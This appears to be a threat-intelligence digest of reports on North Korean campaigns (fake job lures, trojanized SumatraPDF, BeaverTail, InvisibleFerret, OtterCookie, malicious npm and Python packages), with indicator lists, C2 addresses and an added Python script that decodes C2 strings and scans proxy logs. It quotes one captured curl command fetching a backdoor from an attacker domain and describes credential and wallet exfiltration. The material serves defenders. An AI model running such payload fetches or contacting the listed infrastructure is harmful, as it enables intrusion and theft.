An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader

Date:: 2024-09-17 URL:: https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/ Tags:: UNC2970, UNC4034 Details::

  • Mandiant Managed Defense has reported similar activity in 2022 attributed to UNC4034, which was later merged into UNC2970.
  • UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies. Mandiant has observed UNC2970 copy and tailor job descriptions to fit their respective targets.
  • UNC2970 engaged with the victim over email and WhatsApp and ultimately shared a malicious archive that is purported to contain the job description in PDF file format. The PDF file has been encrypted and can only be opened with the included trojanized version of SumatraPDF to ultimately deliver MISTPEN backdoor via BURNBOOK launcher.
  • Mandiant observed UNC2970 modify the open source code of an older SumatraPDF version as part of this campaign. This is not a compromise of SumatraPDF, nor is there any inherent vulnerability in SumatraPDF. Upon discovery, Mandiant alerted SumatraPDF of this campaign for general awareness.
  • UNC2970 relies on legitimate job description content to target victims employed in U.S. critical infrastructure verticals. The job description is delivered to the victim in a password-protected ZIP archive containing an encrypted PDF file and a modified version of an open-source PDF viewer application.
  • For example, under the Required Education, Experience, & Skills section, the original post mentions United States Air Force or highly comparable experience, while the malicious PDF omits this line. Another omitted line is under the Preferred Education, Experience, & Skills section, where the original job description includes Preferred location McLean, Virginia.
  • The backdoor reads configuration data from the file setup.bin if it exists within the same directory. The configuration data includes the sleep time and an ID. The backdoor sleeps for the configured time and sends the message Hi,I m just woke up! to its command-and-control (C2 or C&C) server. Indicators::
  • BAE_VICE President of Business Development.pdf An encrypted file containing both the PDF lure displayed to the user and the MISTPEN backdoor
  • libmupdf.dll PdfFilter.dll SumatraPDF.exe
  • This MISTPEN sample communicates over HTTP with the following Microsoft Graph URLs:
  • login.microsoftonline.com/common/oauth2/v2.0/token
  • graph.microsoft.com/v1.0/me/drive/root:/path/upload/hello/
  • graph.microsoft.com/v1.0/me/drive/root:/path/upload/world/
  • graph.microsoft.com/v1.0/me/drive/items/

Code of Conduct: DPRK’s Python-fueled intrusions into secured networks

Date:: 2024-09-17 URL:: https://elastic.co/security-labs/dprk-code-of-conduct Tags:: Pyperclip, ROT13 Details::

  • Investigating the DPRK’s strategic use of Python and carefully crafted social engineering, this publication sheds light on how they breach highly secure networks with evolving and effective cyber attacks.
  • The main PasswordManager.py file looks like the makings of a basic Python password manager application. Of course, as we noted above, the application imports two third-party modules (Pyperclip and Pyrebase) into this main script.
  • The script within the Pyperclip package exhibits clear signs of malicious behavior, using obfuscation techniques like ROT13 and Base64 encoding to hide its true intent. It identifies the operating system and adapts its actions accordingly, writing to disk and executing an obfuscated Python script in the system’s temporary directory. The script establishes communication with a remote server, enabling remote code execution (RCE) and allowing the attacker to send further commands. This carefully concealed process ensures the script runs stealthily, avoiding detection while maintaining effective C2 (Command and Control) over the infected machine.
  • This lure again masquerades as a Python coding challenge delivered under the guise of a job interview. Its Python code implementation matches exactly the code we’ve analyzed above, and based on description and filename, it matches the lure described by Mandiant as CovertCatch.
  • The next lure is different from the previous ones but matches the Python code implementation we have seen and written about previously. Last year, we brought to light the malware known as KandyKorn that targeted cryptocurrency developers and engineers. Indicators::

Is Rookery Capital a scam?

Date:: 2024-09-17 URL:: https://reddit.com/r/Scams/comments/1f30stp/is_rookery_capital_limited_a_scam/ Tags:: Pyperclip Details::

  • A couple of days ago I was contacted by Mattiass Hansson on Telegram with a job offer. Then I got added to the Rookery Capital Recruitment Slack channel and this started to look suspicious.
  • First of all, I have gone through a lot of recruitment processes but none of them were run through Slack. People on the Slack seem to be bots or fake personalities (e.g. Emily Evelyn, Sonia Clark; their profile images are stock or rockstar pics). There is no information about the company online except a registration in the UK. They're unable to give a description of the position except some very vague words. They build a sense of urgency in how they deal with me. Indicators::

Gleaming Pisces / AppleJeus Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors

Date:: 2024-09-18 URL:: https://unit42.paloaltonetworks.com/gleaming-pisces-applejeus-poolrat-and-pondrat/ Tags:: Applejeus Details::

  • Linux and macOS backdoors via infected Python software packages
  • PondRAT, POOLRAT
  • When examining its code, we observed several similarities to the Linux RAT. This included the function names FConnectProxy and AcceptRequest, and similar code execution flow.
  • In a 2021 report, CISA identified a macOS RAT dubbed prtspool, used as the final payload in one of the AppleJeus (CoinGoTrade) attack waves. Mandiant's analysis of the 3CX supply chain attack also mentioned this RAT family. They reported that attackers used the POOLRAT malware to compromise 3CX’s macOS build environment.
  • ESET has also identified similarities between POOLRAT and a backdoor called BADCALL for Linux, also attributed to Gleaming Pisces.
  • Figure 7 below shows the execution prevention of the POOLRAT macOS backdoor. Indicators::
  • FConnectProxy and AcceptRequest
  • real-ids (versions 0.0.3, 0.0.5)
  • coloredtxt (version 0.0.2)
  • beautifultext (version 0.0.1)
  • minisound (version 0.0.2)
  • curl --silent https://arcashop[.]org/boards.php?type=! --cookie oshelper_session=[REDACTED] --output /home/[REDACTED]/oshelper
  • os_helper
  • jdkgradle[.]com
  • rebelthumb[.]net
  • www.talesseries[.]com/write.php
  • rgedist[.]com/sfxl.php
  • KyPay Wallet Connections
  • kupayupdate_stage2
  • prtspool

Mandiant: UNC5267 Staying a Step Ahead: Mitigating the DPRK IT Worker Threat

Date:: 2024-09-23 URL:: https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat Tags:: Applejeus, DPRK-IT, UNC5267 Details::

  • UNC5267 is not a traditional, centralized threat group. IT workers consist of individuals sent by the North Korean government to live primarily in China and Russia, with smaller numbers in Africa and Southeast Asia. Their mission is to secure lucrative jobs within Western companies, especially those in the U.S. tech sector.
  • Financial gain through illicit salary withdrawals from compromised companies
  • Maintaining long-term access to victim networks for potential future financial exploitation
  • Potential use of access for espionage or disruptive activity (though this hasn't been definitively observed) Indicators::

Dozens of Fortune 100 companies have unwittingly hired North Korean IT workers, according to report

Date:: 2024-09-23 URL:: https://therecord.media/major-us-companies-unwittingly-hire-north-korean-remote-it-workers Tags:: DPRK-IT, UNC5267 Details::

  • The goal is for workers to earn salaries at multiple companies — generating revenue for the North Korean government — and to gain pivotal access to U.S. tech firms that can be used for further cyberattacks or intrusions.
  • The remote workers “often gain elevated access to modify code and administer network systems,” Mandiant found, warning of the downstream effects of allowing malicious actors into a company’s inner sanctum. Indicators::

Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware

Date:: 2024-10-09 URL:: https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/ Tags:: DPRK-IT, DPRK-CI Details::

  • After exfiltrating collected data to the C2, BeaverTail attempts to download the Python programming language to the infected machine from the URL hxxp://<c2_server>:1224/pdown. Downloading Python is essential to successfully executing the InvisibleFerret backdoor payload, which is written in Python. This enables InvisibleFerret to be cross platform as well.
  • InvisibleFerret Installed by Fake MiroTalk Installer
    Indicators::
  • 95.164.17[.]24
  • 185.235.241[.]208

Lazarus Group cluster (BeaverTail)

Date:: 2024-10-10 URL:: https://x.com/michalkoczwara/status/1844302222911476079?s=46&t=X7nkyw1CsOm8Btjy5lyX7w Tags:: DPRK-CI Details::

  • BeaverTail downloads a Python executable (p[.]zip) to the compromised machine from :1224/pdown.
  • Downloading Python is necessary to execute the InvisibleFerret backdoor payload, as it is written in Python. This enables InvisibleFerret to operate across multiple operating systems (Windows, Mac, and Linux). Indicators::
  • 23.106.70[.]154:1244/pdown
  • 23.106.253[.]194:1244/pdown
  • 23.106.253[.]215:1244/pdown
  • 23.106.253[.]221:1244/pdown
  • 23.106.253[.]242:1244/pdown
  • p[.]zip

Bored BeaverTail Yacht Club – A Lazarus Lure

Date:: 2024-10-17 URL:: https://esentire.com/blog/bored-beavertail-yacht-club-a-lazarus-lure Tags:: DPRK-CI Details::

  • The user downloaded a malicious NFT marketplace project named nft_marketplace-main from a GitHub repository
  • Based on our investigation, it was determined that nft_marketplace-main was BeaverTail malware.
  • The NPM package masquerading as BeaverTail was downloaded and then opened in Visual Studio Code; the malicious NPM package was installed via the NPM command line, resulting in the execution of a JavaScript file 'test.js' launched from the '.vscode' folder (Figure 3). Indicators::

Inside a North Korean Phishing Operation Targeting DevOps Employees

Date:: 2024-10-29 URL:: https://securityscorecard.com/blog/inside-a-north-korean-phishing-operation-targeting-devops-employees/ Tags:: DPRK-CI Details::

  • STRIKE also identified additional C2 servers related to the attack that share similar patterns with C2s discovered. The following is a geographical distribution of infected victims over port 1244 used to communicate to the C2.
  • This backdoor was delivered via a malicious Bitbucket repository that was controlled by the threat actor. In this case the backdoor was found in a NodeJS application that was present in the repository. The employee was targeted directly over LinkedIn with an offer of a job related to the development of a Web3 gaming platform, with the claim that their skills matched what the "recruiter" was looking for. It is likely that this threat actor matched the skills present on the employee’s profile to a tailored repository. The threat actor used a compromised LinkedIn account belonging to an individual employed at an organization in the UK. This account has existed since 2010, so it’s certain that the account wasn’t created by the TA.
  • The obfuscated JS backdoor linked to this malicious repository communicated to a C2 server with the IP address of 147[.]124[.]214[.]129. This C2 is hosting other components that may be related to other attacks being conducted on tech workers abroad. This C2 server also downloaded a script that executes a payload that is base64 encoded and XORed as a result. It’s important to note that this script is intended to execute some form of payload once decoded as indicated by the execute statement. The script is loaded into a buffer after decrypting and executed on runtime.
  • At a high level the script performs the following actions against the target system:
  • Operating System Detection
  • Imports Win32crypt in attempt to decrypt stored passwords
  • Imports secretstorage library in Linux to retrieve encryption keys
  • Interacts with MacOS keychain to get encryption keys for Chrome, Opera, Brave or Yandex browsers
  • Focuses on exfiltrating login details and credit cards data stored.
  • This project is a POC for a Web3 eStore. Admins can register merchandise, and clients can buy using SOL and SPL token.
  • Take a look at the project and send me a document with:
    1. Revise the project to ensure that the token name is automatically updated when the token address is entered while adding a new currency in the admin site. Once completed, please attach a recorded video link as confirmation.
    2. Analysis of functions related to the public key BVmdx6PdToCmGcSPUaFCXzrzbrSzRrecbAXS7xgREdDq. Indicators::
  • bitbucket[.]org/techbittinker/web3-eco
  • 147[.]124[.]214[.]129
  • :1244
  • BVmdx6PdToCmGcSPUaFCXzrzbrSzRrecbAXS7xgREdDq

BlueNoroff Hidden Risk Threat Actor Targets Macs with Fake Crypto News and Novel Persistence

Date:: 2024-11-07 URL:: https://sentinelone.com/labs/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/ Tags:: BlueNoroff, RustBucket, zsh Details::

  • SentinelLabs has observed a suspected DPRK threat actor targeting Crypto-related businesses with novel multi-stage malware.
  • We assess with high confidence that the same actor is responsible for earlier attacks attributed to BlueNoroff and the RustDoor/ThiefBucket and RustBucket campaigns.
  • SentinelLabs observed the use of a novel persistence mechanism abusing the Zsh configuration file zshenv.
  • The campaign, which we dubbed ‘Hidden Risk’, uses emails propagating fake news about cryptocurrency trends to infect targets via a malicious application disguised as a PDF file. Indicators::
  • Hidden Risk Behind New Surge of Bitcoin Price
  • Altcoin Season 2.0-The Hidden Gems to Watch
  • New Era for Stablecoins and DeFi, CeFi
  • 23.254.253[.]75, 45.61.128[.]122, 45.61.135[.]105, 45.61.140[.]26, 144.172.74[.]23, 144.172.74[.]141, 172.86.108[.]47, 216.107.136[.]10
  • analysis.arkinvst[.]com, appleaccess[.]pro, arkinvst[.]com, atajerefoods[.]com, buy2x[.]com, calendly[.]caladan[.]video, cardiagnostic[.]net, cmt[.]ventures, community.edwardcaputo[.]shop, community.kevinaraujo[.]shop, community.selincapital[.]com, customer-app[.]xyz, delphidigital[.]org, doc.solanalab[.]org, dourolab[.]xyz, drogueriasanjose[.]net, edwardcaputo[.]shop, email.sellinicapital[.]com, evalaskatours[.]com, happyz[.]one, hwsrv-1225327.hostwindsdns[.]com, info.ankanimatoka[.]com, info.customer-app[.]xyz, kevinaraujo[.]shop, maelstromfund[.]org, maelstroms[.]fund, matuaner[.]com, mc.tvdhoenn[.]net, meet.caladan[.]video, meet.caladangroup[.]xyz, meet.hananetwork[.]video, meet.selinicapital[.]info, meet.selinicapital[.]online, meet.selinicapital[.]xyz, meet.sellinicapital[.]com, meeting.sellinicapital[.]com, meeting.zoom-client[.]com, mg21.1056[.]uk, nodnote.com, online.selinicapital[.]info, online.zoom-client[.]com, panda95sg[.]asia, pixelmonmmo[.]net, presentations[.]life, selincapital[.]com, selinicapital[.]info, selinicapital[.]network, selinicapital[.]online, sellinicapital[.]com, sendmailed[.]com, sendmailer[.]org, shh5.baranftw[.]xyz, tvdhoenn[.]net, verify.selinicapital[.]info, versionupdate.dns[.]army, www.buy2x[.]com, www.delphidigital[.]org, www.frameworks[.]ventures, www.happyz[.]one, www.huspot[.]blog, www.maelstromfund[.]org, www.panda95sg[.]asia, www.prismlab[.]xyz, www.sellinicapital[.]com, www.sendmailed[.]com, www.sendmailer[.]org, www.yoannturp[.]xyz, xu10.1056[.]uk, zoom-client[.]com

Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure Pt.2

Date:: 2024-11-14 URL:: https://esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2 Tags:: DPRK-CI Details::

  • A ZIP file named 'task-space-eshop-aeea6cc51a7c.zip' was found in the user's download directory.
  • Probable that the victim downloaded the zip from a Bitbucket project named eshop (Figure 1).
  • The commits to eshop occurred roughly five days after a job posting for a freelancer was published on a freelance job board.
  • The job was posted by a user named francesco zaid on the www.freelancermap[.]com (Figure 3).
  • The server.js file is used as an entry point to load the file located in backend/middlewares/helpers/error.js, which facilitates further malicious activities on the victim machine, such as stealing saved login credentials from browsers, collecting system information, enumerating crypto wallet extensions in the targeted browsers, and stealing configuration data from crypto wallets like Exodus and Solana.
  • This JavaScript file (error.js) is highly obfuscated and after analysis it was determined to be a component of the BeaverTail malware (Figure 5).
  • After the JavaScript file is loaded, it uses a cURL command to download InvisibleFerret malware components from a command and control (C2) server; in this case the C2 was located at 185[.]235[.]241[.]208[:]1224.
  • BeaverTail then downloads the initial Python script of InvisibleFerret.
  • It is saved on the victim machine as a .sysinfo file in the victim’s home directory (Figure 6).
  • Once the fingerprinting activity is concluded, it is packaged up and exfiltrated via HTTP POST request to hxxp://185.235.241[.]208:1224/keys (Figure 12).
  • The C2 IP address is de-obfuscated by shifting the first nine characters to the end of the string then base64 decoding the set.
  • On Windows systems, the main backdoor client is initiated alongside a keylogger and clipboard stealer which utilizes the pyHook, pythoncom and pyperclip Python libraries (Figure 13).
  • Captured keystrokes and clipboard data are written to the global e_buf variable then sent back to the C2 (via TCP connection to 185.235.241[.]208:2245) when the ssh_clip command is called within the backdoor session.
  • in_pk: Checks if a string contains a private key by searching for specific hexadecimal patterns that match typical private key lengths.
  • ismnemonic: Determines if a string contains a valid mnemonic phrase by checking for typical word counts and validating the phrase.
  • is_exceptFile: Checks if a file name has an extension that should be excluded from processing.
  • is_exceptPath: Checks if a path name matches any directories that should be excluded.
  • is_pat: Checks if a file name contains specific patterns related to environment variables and other sensitive files
  • Filenames are prepended with the current time and the hostname is prepended with the subid 29, as seen in Figure 15. Indicators::
  • 185.235.241[.]208:1224/uploads
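The two pieces of analyst tooling that the 2024-10-10 BeaverTail cluster entry and this Pt.2 entry call for, written out as an added example in Python (it is not eSentire's, Unit 42's or this repository's own code): `decode_c2` applies the de-obfuscation exactly as the entry states it (move the first nine characters to the end, then base64-decode), and `scan_proxy_log` flags proxy-log lines whose URL path is one of the chain's endpoints named on this page (/pdown for the Python runtime download, /keys for the fingerprint POST, /uploads, /client/...). The obfuscated sample string, the "client method url" log format and the log lines are constructed for the example; the addresses in them are the ones the entries list.

```python
"""Helpers for the BeaverTail / InvisibleFerret chain described above.

Added example, not code from eSentire, Unit 42 or this repository.
Assumptions: (1) the C2-string scheme is exactly as the eSentire write-up
states it (rotate the first nine characters to the end, then base64-decode);
(2) proxy logs arrive as whitespace-separated "client method url" lines.
All sample values below are constructed for the example.
"""
import base64
import re

ROTATE = 9  # number of leading characters the malware moved to the end


def decode_c2(obfuscated: str) -> str:
    """Recover the plaintext C2 string: un-rotate, then base64-decode."""
    rotated = obfuscated[ROTATE:] + obfuscated[:ROTATE]
    # Tolerate samples whose author stripped base64 padding.
    rotated += "=" * (-len(rotated) % 4)
    return base64.b64decode(rotated).decode("utf-8", errors="replace")


# Constructed sample: base64("185.235.241.208") with its last nine characters
# moved to the front, i.e. the form an analyst would pull out of the script.
SAMPLE_OBFUSCATED = "yNDEuMjA4MTg1LjIzNS4"

# URL paths this page associates with the chain. The port varies between
# entries (1224 in most, 1244 in one tweet, 80 in the npm case), so the
# path is the more stable pivot; the port set is kept for reporting only.
SUSPECT_PATH = re.compile(r"^/(pdown|keys|uploads|client/\S*)$")
REPORTED_PORTS = {80, 1224, 1244, 1245}
URL_RE = re.compile(
    r"^https?://(?P<host>[^/:\s]+)(?::(?P<port>\d+))?(?P<path>/\S*)?$"
)


def is_suspect_url(url: str) -> bool:
    """True when the URL path is one of the chain's known endpoints."""
    m = URL_RE.match(url)
    if not m or not m.group("path"):
        return False
    return bool(SUSPECT_PATH.match(m.group("path")))


def scan_proxy_log(lines):
    """Return (client, url) pairs whose destination matches the chain."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue  # malformed or empty line
        client, _method, url = parts[0], parts[1], parts[2]
        if is_suspect_url(url):
            hits.append((client, url))
    return hits


# Constructed proxy log lines; the destination addresses are those listed
# in the entries on this page, the client addresses are made up.
SAMPLE_LOG = [
    "10.0.0.15 GET http://185.235.241.208:1224/pdown",
    "10.0.0.15 POST http://185.235.241.208:1224/keys",
    "10.0.0.22 GET http://example.org:443/index.html",
    "10.0.0.31 GET http://91.92.120.132:80/pdown",
    "10.0.0.40 POST http://23.106.70.154:1244/pdown",
]

if __name__ == "__main__":
    print("decoded C2:", decode_c2(SAMPLE_OBFUSCATED))
    for client, url in scan_proxy_log(SAMPLE_LOG):
        print("suspect:", client, "->", url)
```

The /keys and /uploads paths are generic enough to appear in benign traffic, so in practice the hits from `scan_proxy_log` are a triage queue to be joined against the destination-IP indicators above rather than an alert on their own; the `decode_c2` routine is the part that lets an analyst pull the current C2 out of a fresh sample without running it.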

Two sample URLs recently used to target Comma3 Ventures and Castle Island Ventures

Date:: 2024-11-14 URL:: https://x.com/1ZRR4H/status/1856985633153053060 Tags:: SquidSquad Details::

  • Two sample URLs recently used to target Comma3 Ventures and Castle Island Ventures in the meetings campaign. Indicators::
  • comma3.biz-meeting.site/join/THe-BfVv-VuK
  • castleisland.sky-meeting.com/business/private/dQF-uWpG-hjJ

Chainalysis: $2.2 Billion Stolen from Crypto Platforms in 2024, but Hacked Volumes Stagnate Toward Year-End as DPRK Slows Activity Post-July

Date:: 2024-12-19 URL:: https://chainalysis.com/blog/crypto-hacking-stolen-funds-2025/ Tags:: Money Laundering Details::

  • Note that, in last year’s report, we published that the DPRK stole $1.0 billion across 20 hacks. Upon further investigation, we determined that certain large hacks we had previously attributed to the DPRK are likely no longer related, hence the decrease to $660.50 million. However, the number of incidents remains the same, as we identified other smaller hacks attributed to the DPRK. We aim to constantly re-evaluate our assessment of DPRK-linked hacking events as we acquire new on-chain and off-chain evidence. Indicators::

Microsoft shares latest intelligence on North Korean and Chinese threat actors at CYBERWARCON

Date:: 2024-12-22 URL:: https://microsoft.com/en-us/security/blog/2024/11/22/microsoft-shares-latest-intelligence-on-north-korean-and-chinese-threat-actors-at-cyberwarcon/ Tags:: DPRK-IT Details::

  • Sapphire Sleet: Masquerading as a venture capitalist
  • Sapphire Sleet: Posing as recruiters
  • Ruby Sleet: Sophisticated phishing targeting satellite and weapons systems-related targets
  • North Korean IT workers: The triple threat
  • Facilitators complicate tracking of IT worker ecosystem
  • Fake profiles and portfolios with the aid of AI Indicators::

FBI, DC3, and NPA Identification of North Korean Cyber Actors, Tracked as TraderTraitor, Responsible for Theft of $308 Million USD from Bitcoin.DMM.com

Date:: 2024-12-23 URL:: https://fbi.gov/news/press-releases/fbi-dc3-and-npa-identification-of-north-korean-cyber-actors-tracked-as-tradertraitor-responsible-for-theft-of-308-million-from-bitcoindmmcom Tags:: TraderTraitor, UNC4899, Money Laundering Details::

  • The Federal Bureau of Investigation, Department of Defense Cyber Crime Center, and National Police Agency of Japan are alerting the public to the theft of cryptocurrency worth $308 million U.S. dollars from the Japan-based cryptocurrency company DMM by North Korean cyber actors in May 2024. The theft is affiliated with TraderTraitor threat activity, which is also tracked as Jade Sleet, UNC4899, and Slow Pisces. TraderTraitor activity is often characterized by targeted social engineering directed at multiple employees of the same company simultaneously.
  • In late March 2024, a North Korean cyber actor, masquerading as a recruiter on LinkedIn, contacted an employee at Ginco, a Japan-based enterprise cryptocurrency wallet software company. The threat actor sent the target, who maintained access to Ginco’s wallet management system, a URL linked to a malicious Python script under the guise of a pre-employment test located on a GitHub page. The victim copied the Python code to their personal GitHub page and was subsequently compromised.
  • After mid-May 2024, TraderTraitor actors exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system. In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack. The stolen funds ultimately moved to TraderTraitor-controlled wallets.
  • The FBI, National Police Agency of Japan, and other U.S. government and international partners will continue to expose and combat North Korea’s use of illicit activities—including cybercrime and cryptocurrency theft—to generate revenue for the regime. Indicators::

OtterCookie, a new malware used by Contagious Interview

Date:: 2024-12-24 URL:: https://jp.security.ntt/tech_blog/contagious-interview-ottercookie Tags:: DPRK-CI Details::

  • Since around November 2024, SOC has observed the execution of malware other than BeaverTail and InvisibleFerret in the Contagious Interview campaign
  • We call the newly observed malware OtterCookie and have investigated it
  • In this article, we will introduce OtterCookie, its execution flow and detailed behavior.
  • The OtterCookie observed in September already has a function to steal keys related to cryptocurrency wallets
  • For example, the checkForSensitiveData function checks Ethereum private keys using regular expressions
  • In the November OtterCookie, this is achieved by remote shell commands. Indicators::
  • 45[.]159.248.55
  • zkservice[.]cloud
  • w3capi[.]marketing
  • payloadrpc[.]com

2025

North Korea-nexus Golang Backdoor/Stealer from Contagious Interview campaign

Date:: 2025-01-04 URL:: https://dmpdump.github.io/posts/NorthKorea_Backdoor_Stealer/ Tags:: DPRK-CI Details::

  • Golang backdoor/stealer -> fake chrome updater
  • Victims were sent a link to sites impersonating the legitimate Willo candidate screening site. The fake sites eventually displayed a fake error and provided users with a malicious fix, such as the following command. The victims are lured into copying/pasting the command on their devices, triggering the download and installation of the payload.
  • This ZIP file contains artifacts to target Windows, Mac, and Linux, which is consistent with the multi-platform targeting of this threat actor and the use of cross-platform languages such as Golang. I’ll focus on the artifacts affecting Mac users. The script executed in the “fake fix” lure is likely ffmpeg.sh. This shell script triggers the download, execution, and persistence of the payload, along with a Mach-O app. Indicators::
  • ffmpeg.sh
  • 216.74.123[.]191:8080
  • api.jz-aws[.]info/public/images/
  • ChromeUpdateAlert.app

Operation 99: North Korea’s Cyber Assault on Software Developers

Date:: 2025-01-15 URL:: https://securityscorecard.com/blog/operation-99-north-koreas-cyber-assault-on-software-developers/?t Tags:: DPRK-IT Details::

  • Targets software developers looking for freelance Web3 and cryptocurrency work. If you thought fake job offers from the group’s Operation DreamJob campaign were bad, this latest move is a masterclass in deception, sophistication, and malicious intent.
  • The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews. Once a victim takes the bait, they’re directed to clone a malicious GitLab repository—seemingly harmless, but packed with disaster. The cloned code connects to Command-and-Control (C2) servers, embedding malware into the victim’s environment.
  • The attack features a multi-stage malware system with modular components. These include:
  • Main99: A downloader that connects to C2 servers, retrieving additional payloads.
  • Payload99/73: Implants capable of keylogging, clipboard monitoring, and file exfiltration.
  • MCLIP: A dedicated implant for keyboard and clipboard monitoring.
  • This modular framework is as flexible as it is dangerous. It works across platforms—Windows, macOS, and Linux—embedding itself into developer workflows with surgical precision. By adapting malware to each target, the Lazarus Group ensures maximum impact with minimum detection.
  • The C2 servers for Operation 99 are hosted by Stark Industries LLC, deploying heavily obfuscated Python scripts. These scripts compress data using ZLIB and tailor payloads to specific victims. Indicators::

Securing Cryptocurrency Organizations

Date:: 2025-01-21 URL:: https://cloud.google.com/blog/topics/threat-intelligence/securing-cryptocurrency-organizations Tags:: Details::

  • The threats posed to these organizations are significant. Mandiant has observed cryptocurrency organizations employing heightened security controls driven by pressures from widespread reporting of impactful heists, however, many still remain unprepared for the threats they face.
  • Across its Incident Response engagements conducted at cryptocurrency organizations, Mandiant has observed common challenges relatively unique to these types of organizations. Mandiant has observed that these challenges introduce significant technical security debt, complexity, and widened attack surfaces, which make preventing, detecting, and responding to intrusions increasingly challenging.
  • Hyperfocus on wallet infrastructure: Many organizations focus on the security of wallet infrastructure but fall short on fundamental enterprise security practices.
  • Rapid development lifecycles: Cryptocurrency organizations, especially startups, often need to develop platforms fast, driven by aggressive market competition and investor pressure.
  • Unmanaged workforces: Given the demand for cryptocurrency platform developers, many organizations employ contractors or freelancers, who work for multiple organizations at the same time from their own devices. These devices are generally not monitored or policy-enforced by the organizations the user works for, and compromise of one of these devices may lead to intrusions at multiple organizations.
  • Unmanaged or disparate infrastructure: Given how rapidly many organizations have grown, infrastructure can be relatively chaotic, with disparate systems across multiple environments or cloud providers, with ad-hoc inventory or change management practices. Indicators::

North Korean IT Workers Conducting Data Extortion

Date:: 2025-01-23 URL:: https://ic3.gov/PSA/2025/PSA250123 Tags:: DPRK-IT Details::

  • Extortion and Theft of Sensitive Company Data
  • After being discovered on company networks, North Korean IT workers have extorted victims by holding stolen proprietary data and code hostage until the companies meet ransom demands. In some instances, North Korean IT workers have publicly released victim companies' proprietary code.
  • North Korean IT workers have copied company code repositories, such as GitHub, to their own user profiles and personal cloud accounts. While not uncommon among software developers, this activity represents a large-scale risk of theft of company code.
  • North Korean IT workers could attempt to harvest sensitive company credentials and session cookies to initiate work sessions from non-company devices and for further compromise opportunities. Indicators::

US DOJ: Operators of Cryptocurrency Mixers Sinbad and Blender Charged with Money Laundering

Date:: 2025-01-10 URL:: https://www.justice.gov/opa/pr/operators-cryptocurrency-mixers-charged-money-laundering Tags:: Money Laundering Details::

  • A federal grand jury in the Northern District of Georgia returned an indictment on Jan. 7 charging three Russian nationals for their involvement in operating the cryptocurrency mixing services Blender.io and Sinbad.io. Roman Vitalyevich Ostapenko and Alexander Evgenievich Oleynik were arrested on Dec. 1, 2024, roughly a year after Sinbad.io’s online infrastructure was seized as part of a coordinated law enforcement action among the Netherlands’ Financial Intelligence and Investigative Service, Finland’s National Bureau of Investigation, and the FBI. The third defendant, Anton Vyachlavovich Tarasov, remains at large.
  • Both Blender.io and Sinbad.io have been sanctioned by the Department of Treasury’s Office of Foreign Assets Control (OFAC). On May 6, 2022, OFAC sanctioned Blender.io, citing its use by the Democratic People’s Republic of Korea (DPRK) to launder stolen virtual currency. OFAC’s public sanctions announcement also explained that Blender.io laundered funds for multiple ransomware groups. On Nov. 29, 2023, OFAC sanctioned Sinbad.io, publicly citing its use by a DPRK state-sponsored hacking group and cybercriminals to obfuscate transactions linked to other criminal offenses.
  • Ostapenko, 55, is charged with one count of conspiracy to commit money laundering and two counts of operating an unlicensed money transmitting business. Oleynik, 44, and Tarasov, 32, are both charged with one count of conspiracy to commit money laundering and one count of operating an unlicensed money transmitting business. If convicted, the defendants each face a maximum penalty of 20 years in prison for the money laundering conspiracy count and five years in prison for each unlicensed money transmitting business count. A federal district court judge will determine any sentence after considering the U.S. Sentencing Guidelines and other statutory factors. Indicators::

‘JustJoin’ Landing Page Linked to Suspected DPRK Activity Resurfaces

Date:: 2025-01-14 URL:: https://hunt.io/blog/justjoin-landing-page-linked-to-suspected-dprk-activity-resurfaces Tags:: Bluenoroff, TA444 Details::

  • TA444/BlueNoroff Infrastructure
  • Our scan results led us to IP address 23.254.167[.]216, hosted on Hostwinds in the United States, with only one service exposed: HTTP on port 80. Examining the server revealed headers consistent with previously observed DPRK-related activity. These included Apache, OpenSSL, and PHP, which, while not uniquely tied to BlueNoroff, provided a solid basis for further investigation.
  • Figure 2: 'JustJoin' landing page hosted at a0info.v6[.]army Indicators::
  • 23.254.167[.]216
  • 108.174.194[.]44
  • 108.174.194[.]196
  • taglala[.]com
  • hamzastrs[.]pro
  • rr.1u[.]ms
  • a0info.v6[.]army
  • cryptorgram[.]com
  • www.cryptorgram[.]com

North Korean APT Lazarus Targets Developers with Malicious npm Package

Date:: 2025-01-29 URL:: https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package Tags:: DPRK-CI Details::

  • Socket researchers have discovered the malicious npm package postcss-optimizer, which contains code linked to previously documented campaigns conducted by North Korean state-sponsored threat actors known as Contagious Interview, a subgroup within the broader Lazarus Advanced Persistent Threat (APT) group. Indicators::
  • postcss-optimizer
  • 91.92.120[.]132:80/client/xxx
  • 91.92.120[.]132:80/pdown
  • 91.92.120[.]132:80/uploads
  • npm username: yolorabbit
  • email used to register npm username: surprise.eng000@gmail.com

Operation Phantom Circuit: North Korea’s Global Data Exfiltration Campaign

Date:: 2025-01-29 URL:: https://securityscorecard.com/wp-content/uploads/2025/01/Operation-Phantom-Circuit-Report_013025_04.pdf Tags:: DPRK-CI, DPRK-IT Details::

  • Communication with infected systems over port 1224
  • Administrative platform accessible via port 1245, featuring a hidden React web application and Node.js API.
  • Remotely organize and manage stolen data globally.
